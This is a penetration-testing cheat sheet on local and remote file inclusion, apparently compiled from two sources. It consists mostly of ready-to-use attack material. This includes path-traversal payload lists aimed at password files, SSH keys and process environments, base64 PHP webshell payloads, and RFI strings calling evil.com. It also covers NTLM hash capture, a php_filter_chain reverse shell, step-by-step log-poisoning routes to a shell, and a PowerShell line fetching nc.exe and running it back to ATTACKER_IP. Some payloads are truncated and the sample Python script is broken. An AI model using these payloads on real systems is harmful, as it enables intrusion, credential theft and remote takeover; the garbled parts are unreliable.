# File Inclusion (LFI/RFI) Local File Inclusion (LFI) and Remote File Inclusion (RFI) are vulnerabilities that are often found to affect web applications that rely on a scripting run time. ### Local File Inclusion (LFI) ```shellscript ?page=../ ?page=/etc/passwd ?page=../../../../etc/passwd ?page=../../../../../etc/passwd ?page=..././..././..././..././etc/passwd ?page=..//..//..//..//..//etc/passwd ?page=....//....//....//....//etc/passwd ?page=....//....//....//....//....//....//etc/passwd ?page=.....///.....///.....///.....///etc/passwd ?page=../../../../../../../../../../../../../../etc/passwd ?page=..\/..\/..\/..\/etc/passwd ?page=/var/www/html/..//..//..//etc/passwd ?page=/etc/passwd& ?page=/etc/passwd%00 ?page=example.php%00.txt ?page=/etc/passwd%00.inc ?page=/etc/passwd%00.php ?page=http://localhost/index ?page=http://localhost:3000/index.html ?page=http://localhost:8000/index.html ?page=somedir/../../../../etc/passwd&ext= # URL encoding ?page=..%2F..%2F..%2F..%2Fetc/passwd ?page=..%5C..%5C..%5C..%5Cetc/passwd ?page=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd ?page=http:%5C%5Cindex # URL double encoding ?page=..%252F..%252F..%252F..%252fetc/passwd ?page=%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd ?page=http:%252F%252Findex # UTF-8 encoding ?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd # Dot truncation ?page=../../../../etc/passwd.......................................................... # File scheme ?page=file:///etc/passwd ?page=file:%2F%2F%2Fetc%2Fpasswd ?page=file:%252F%252F%252Fetc%252Fpasswd ?page=file%3A///etc/passwd ?page=file%3A%2F%2F%2Fetc%2Fpasswd ?page=file%3A%252F%252F%252Fetc%252Fpasswd ?page=file://var/www/html/index.php ?page=file://var/www//index.php # Other local web servr ?page=http://127.0.0.1/ ?page=http://127.0.0.1:3000/ ?page=http://127.0.0.1:8000/ # PHP Filter ?page=php://filter/resource=/etc/passwd ?page=php://filter/read=string.rot13/resource=index.php ?page=php://filter/convert.base64-encode/resource=index.php ?page=pHp://filter/convert.base64-encode/resource=index.php ?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd ?page=data://text/plain, # PHP Filter (Base64 encoding) # `PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+`: `` ?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+&cmd=whoami # `PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=`: `` ?page=php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=&cmd=whoami # PHP Session File ?page=/var/lib/php/sessions/sess_ ``` To automate this process, we can fuzzing as follow. ```shellscript ffuf -u http://example.com/?page=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt ffuf -u http://example.com/?page=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt ``` #### Abuse Server Misconfiguration We can try to test common paths instead of params by abusing server’s alias misconfiguration. ```shellscript /images/../etc/passwd /images/../../etc/passwd /images../etc/passwd /images../../etc/passwd ``` #### Interesting Files When our payload is successful, we can additionaly investigate local files and retrieve sensitivin information. ```shellscript # Home directories ?page=/home//.bashrc ?page=/home//.bash_history ?page=/home//.bash_logout ?page=/home//.bash_profile ?page=/home//.profile ?page=/home//.ssh/id_rsa # Root directory ?page=/root/.bashrc ?page=/root/.bash_history ?page=/root/.bash_logout ?page=/root/.bash_profile ?pgae=/root/.profile ?page=/root/.ssh/id_rsa # System-wide configurations ?page=/etc/bash.bashrc # OS ?page=/etc/lsb-release ?page=/etc/os-release # Processes ?page=/proc/net/tcp ?page=/proc/self/cmdline ?page=/proc/self/environ ?page=/proc/self/fd/0 ?page=/proc/self/fd/1 ?page=/proc//cmdline ?page=/proc//environ # Mail ?page=/var/mail/ ?page=/var/spool/mail/ # Postfix ?page=/var/log/mail.log ?page=/var/log/maillog # Host ?page=/etc/hosts ?page=/etc/hostname # Cron ?page=/etc/crontab # Web root ?page=/var/www/html/index.html ?page=/var/www/html/index.php ?page=/var/www/html/.htaccess ?page=/var/www/html/.htpasswd ?page=/var/www/example.com/index.php ?page=/var/www/sudomain/index.php ?page=/var/www/subdomain.example.com/index.php ?page=/var/www/wordpress/index.php ?page=/home//app/index.html ?page=/home//webapp/index.html # Apache ?page=/etc/apache2/.htpasswd ?page=/etc/apache2/apache2.conf ?page=/etc/apache2/envvars ?page=/etc/apache2/ports.conf ?page=/etc/apache2/sites-available/domain.conf ?page=/etc/apache2/sites-available/example.com.conf ?page=/etc/apache2/sites-available/sub.example.com.conf ?page=/etc/apache2/sites-available/sub.conf ?page=/etc/apache2/sites-enabled/000-default.conf ?page=/etc/apache2/sites-enabled/domain.conf ?page=/etc/apache2/sites-enabled/example.com.conf ?page=/etc/apache2/sites-enabled/sub.example.com.conf ?page=/etc/apache2/sites-enabled/sub.conf ?page=/var/log/apache/access.log ?page=/var/log/apache/error.log ?page=/var/log/apache2/access.log ?page=/var/log/apache2/error.log # Apache Tomcat ?page=/opt/tomcat/conf/tomcat-users.xml ?page=/opt/tomcat/logs/catalina.err ?page=/opt/tomcat/logs/catalina.out # Nginx ?page=/var/log/nginx/access.log ?page=/var/log/nginx/error.log ?page=/etc/nginx/nginx.conf ?page=/etc/nginx/conf.d/.htpasswd ?page=/etc/nginx/conf.d/example.com.conf ?page=/etc/nginx/conf.d/example.conf ?page=/etc/nginx/conf.d/subdomain.example.com.conf ?page=/etc/nginx/conf.d/subdomain.conf ?page=/etc/nginx/sites-available/default ?page=/etc/nginx/sites-available/example.com.conf ?page=/etc/nginx/sites-enabled/default ?page=/etc/nginx/sites-enabled/example.com.conf ?page=/usr/local/nginx/conf/nginx.conf ?page=/usr/local/etc/nginx/nginx.conf # PHP web conf (x.x is specified PHP version) ?page=/etc/php/x.x/apache2/php.ini ?page=/etc/php/x.x/cli/php.ini ?page=/etc/php/x.x/fpm/php.ini # Flask ?page=index.html ?page=../__init__.py ?page=../app.py ?page=../db.py ?page=../main.py ?page=/home///app.py ?page=/opt//app.py ?page=/srv//app.py # BIND ?page=/etc/bind/named.conf ?page=/etc/bind/named.conf.options ?page=/etc/bind/named.conf.local ?page=/etc/bind/named.conf.default-zones # Windows ?page=C:/Windows/debug/NetSetup.log ?page=C:/Windows/System32/drivers/etc/hosts ?page=C:/Windows/System32/inetsrv/config/applicationHost.config ?page=../../../../../../../../windows/system32/drivers/etc/hosts ?page=C:/Users/Public/Desktop/desktop.ini ?page=C:/Users/FUZZ/Desktop/desktop.ini # user enumeration ?page=C:/inetpub/wwwroot//web.config ?page=C:/xampp/apache/conf/httpd.conf ?page=C:/xampp/apache/conf/extra/httpd-userdir.conf ?page=C:/xampp/apache/conf/extra/httpd-vhosts.conf ?page=C:/xampp/apache/conf/extra/httpd-xampp.conf ?page=C:/xampp/apache/conf/extra/httpd-ajp.conf ?page=C:/xampp/apache/logs/access.log ?page=C:/xampp/apache/logs/error.log ?page=C:/xampp/cgi-bin/example.cgi ?page=C:/xampp/htdocs/example.com/index.php ?page=C:/xampp/htdocs/sub.example.com/index.php ?page=C:/xampp/phpMyAdmin/index.php ?page=C:/xampp/phpMyAdmin/config.inc.php ``` #### Using Curl If we want to test against the URL path not param, `curl` can be used with the option `--path-as-is`: ```shellscript curl --path-as-is http://example.com/../../../../etc/passwd ``` #### Read Process Commands We can retrieve commands that start processes by enumerating **`/proc/PID/cmdline`**.\ Create a Python script that enumerates them. We can refer to [this blog post](https://notes.huskyhacks.dev/blog/tryhackme-takedown-walkthrough-v1)'s "This leaves the server vulnerable to Local File Inclusion." section. ```shellscript # lfi.py import requests import time for i in range(10): print(f"[+] Trying {i}") url = "http://example.com/?file=/proc/" + i + "/cmdline" resp = requests.get(url) print(resp.content) time.sleep(1) ``` Then execute this file. ```shellscript python3 lfi.py ``` ### Remote File Inclusion (RFI) ```shellscript ?page=//evil.com/exploit ?page=%2F%2fevil.com/exploit ?page=%2C%2Cevil.com/exploit ?page=http://evil.com/exploit ?page=http%3A//evil.com/exploit ?page=http%3A%2F%2Fevil%2Ecom/exploit ?page=http%253A%252F%252Fevil%252Ecom/ ?page=test@sub.example.com/ ``` #### Steal NTLM Hashes (Windows) If the website is hosted on Windows, we may be able to retrieve password hashes using **Responder**.\ In local machine, start responder. ```shellscript # -I: Interface e.g. eth0, tun0, etc. sudo responder -I tun0 ``` Then send request to **`https://example.com/?page=///test`**.\ Now we may be able to capture the hashes.\ If so, we can crack it using **JohnTheRipper** or **Hashcat**. Please refer to [this page](https://exploit-notes.hdks.org/exploit/cryptography/algorithm/ntlm-ntlmv2/) for cracking NTLM. ### Remote Code Execution (RCE) [php\_filter\_chain\_generator](https://github.com/synacktiv/php_filter_chain_generator) is CLI that generates payload for PHP filter bypass and allow us to RCE.\ Below is the payload for reverse shell. ``` wget https://raw.githubusercontent.com/synacktiv/php_filter_chain_generator/main/php_filter_chain_generator.py python3 php_filter_chain_generator.py --chain "& /dev/tcp/10.0.0.1/4444 0>&1\"')?>" ``` Then copy the output and paste it to the target. ### Log Poisoning #### 1. Check if You Can Access the Apache Log File ```shellscript # Debian, Ubuntu Linux /?page=/var/log/apache/access.log /?page=../../../../var/log/apache/access.log /?page=/var/log/apache2/access.log /?page=../../../../var/log/apache2/access.log # FreeBSD Linux /?page=/var/log/httpd-access.log /?page=../../../../var/log/httpd-access.log # CentOS, Fedora, RedHat Linux /?page=/var/log/httpd/access_log /?page=../../../../var/log/httpd/access_log ``` #### 2. Prepare the Payload for PHP Reverse Shell ```shellscript wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php # Edit the values in the payload $ip = ''; $port = 4444; ``` #### 3. Open Web Server in Local Machine ``` python -m http.server 80 ``` #### 4. Inject PHP Payload in the User-Agent Send the GET Request with abusing the User-Agent.\ The payload can be uploaded to the **`/shell.php`** of the target website. ``` GET / HTTP/1.1 ... User-Agent: /shell.php')); ?> ``` If we got some error such as **"500 Internal Server Error"** when the next steps, try to modify the payload a bit. For example, * Change single quotes (**'**) to double quotes (**"**). * Change double quotes (**"**) to single quotes (**'**). * Change **` Refresh the page **`/index.php?page=../../../../var/log/apache2/access.log`** . #### 6. Open Listener for Reverse Shell In you local machine, open the listener.\ You need to specify the port which you set the section 2. ``` nc -lvnp 4444 ``` #### 7. Gain Access to Shell Access to **`/shell.php`** of the target website.\ If it goes well, you can get a shell. ### SMTP Log Poisoning Reference: If the target system opens SMTP and we can see the email logs, we may inject arbitrary code to the email log and lead to RCE. #### 1. Check Log Files with LFI Below is the log file location examples: ```shellscript # Exim ?page=/var/log/exim_mainlog ?page=/var/log/exim/main.log # Postfix ?page=/var/log/mail.log ?page=/var/log/maillog ?page=/var/adm/maillog ?page=/var/adm/syslog/mail.log ``` #### 2. Send Email Included RCE via SMTP Server ```shellscript # 1. Connect to the SMTP server telnet x.x.x.x 25 # 2. Check existing account vrfy root 250 2.0.0 root vrfy admin 250 2.0.0 admin vrfy administrator 250 2.0.0 administrator ... # 3. Send email included arbitrary code MAIL FROM: support@victim.com RCPT TO: ``` #### 3. Achieve RCE with LFI Now go back to the vulnerable web page. Send request of LFI such as below: ``` /?page=/var/log/mail.log&cmd=whoami ``` If the result of the system command is displayed in the response, we can execute other commands (e.g. for Reverse Shell). ### References * [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion) ### Tools ```bash # https://github.com/kurobeats/fimap fimap -u "http://10.11.1.111/example.php?test=" # https://github.com/P0cL4bs/Kadimus ./kadimus -u localhost/?pg=contact -A my_user_agent # https://github.com/wireghoul/dotdotpwn dotdotpwn.pl -m http -h 10.11.1.111 -M GET -o unix # Apache specific: https://github.com/imhunterand/ApachSAL ``` {% hint style="info" %} **How to** 1. Look requests with filename like `include=main.inc template=/en/sidebar file=foo/file1.txt` 2. Modify and test: `file=foo/bar/../file1.txt` 1. If the response is the same could be vulnerable 2. If not there is some kind of block or sanitizer 3. Try to access world-readable files like `/etc/passwd /win.ini` {% endhint %} ### LFI ```bash # Basic LFI curl -s http://10.11.1.111/gallery.php?page=/etc/passwd # If LFI, also check /var/run/secrets/kubernetes.io/serviceaccount # PHP Filter b64 http://10.11.1.111/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd && base64 -d savefile.php http://10.11.1.111/index.php?m=php://filter/convert.base64-encode/resource=config http://10.11.1.111/maliciousfile.txt%00?page=php://filter/convert.base64-encode/resource=../config.php # Nullbyte ending http://10.11.1.111/page=http://10.11.1.111/maliciousfile%00.txt http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00 # Other techniques https://abc.redact.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c https://abc.redact.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd https://abc.redact.com/static/../../../../../../../../../../../../../../../etc/passwd https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00 https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.html https://abc.redact.com/asd.php?file:///etc/passwd https://abc.redact.com/asd.php?file:///etc/passwd%00 https://abc.redact.com/asd.php?file:///etc/passwd%00.html https://abc.redact.com/asd.php?file:///etc/passwd%00.ext https://abc.redact.com/asd.php?file:///..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.ext/etc/passwd https://target.com/admin..;/ https://target.com/../admin https://target.com/whatever/..;/admin https://target.com/whatever.php~ # Cookie based GET /vulnerable.php HTTP/1.1 Cookie:usid=../../../../../../../../../../../../../etc/pasdwd # LFI Windows http://10.11.1.111/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00 http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini http://10.11.1.111/addguestbook.php?LANG=../../../../../../../../../../../../../../../boot.ini http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00 http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00.html http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00 http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00.html http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00 http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00.html http://10.11.1.111/addguestbook.php?LANG=file:///C:/boot.ini http://10.11.1.111/addguestbook.php?LANG=file:///C:/win.ini http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00.ext http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00.ext # LFI using video upload: https://github.com/FFmpeg/FFmpeg https://hackerone.com/reports/226756 https://hackerone.com/reports/237381 https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit https://github.com/neex/ffmpeg-avi-m3u-xbin # Contaminating log files root@kali:~# nc -v 10.11.1.111 80 10.11.1.111: inverse host lookup failed: Unknown host (UNKNOWN) [10.11.1.111] 80 (http) open http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig # Common LFI to RCE: Using file upload forms/functions Using the PHP wrapper expect://command Using the PHP wrapper php://file Using the PHP wrapper php://filter Using PHP input:// stream Using data://text/plain;base64,command Using /proc/self/environ Using /proc/self/fd Using log files with controllable input like: /var/log/apache/access.log /var/log/apache/error.log /var/log/vsftpd.log /var/log/sshd.log /var/log/mail # LFI possibilities by filetype ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE SVG: Stored XSS / SSRF / XXE GIF: Stored XSS / SSRF CSV: CSV injection XML: XXE AVI: LFI / SSRF HTML / JS : HTML injection / XSS / Open redirect PNG / JPEG: Pixel flood attack (DoS) ZIP: RCE via LFI / DoS PDF / PPTX: SSRF / BLIND XXE # Chaining with other vulns ../../../tmp/lol.png —> for path traversal sleep(10)-- -.jpg —> for SQL injection .jpg/png —> for XSS ; sleep 10; —> for command injections # 403 bypasses /accessible/..;/admin /.;/admin /admin;/ /admin/~ /./admin/./ /admin?param /%2e/admin /admin# /secret/ /secret/. //secret// /./secret/.. /admin..;/ /admin%20/ /%20admin%20/ /admin%20/page /%61dmin # Path Bypasses # 16-bit Unicode encoding # double URL encoding # overlong UTF-8 Unicode encoding ….// ….\/ …./\ ….\\ ``` ### RFI ```bash # RFI: http://10.11.1.111/addguestbook.php?LANG=http://10.11.1.111:31/evil.txt%00 Content of evil.txt: # RFI over SMB (Windows) cat php_cmd.php # Start SMB Server in attacker machine and put evil script # Access it via browser (2 request attack): # http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c Invoke-WebRequest -Uri "http://10.10.14.42/nc.exe" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe" # http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe" -e cmd.exe ATTACKER_IP 1234 # Cross Content Hijacking: https://github.com/nccgroup/CrossSiteContentHijacking https://soroush.secproject.com/blog/2014/05/even-uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack/ http://50.56.33.56/blog/?p=242 # Encoding scripts in PNG IDAT chunk: https://yqh.at/scripts_in_pngs.php ```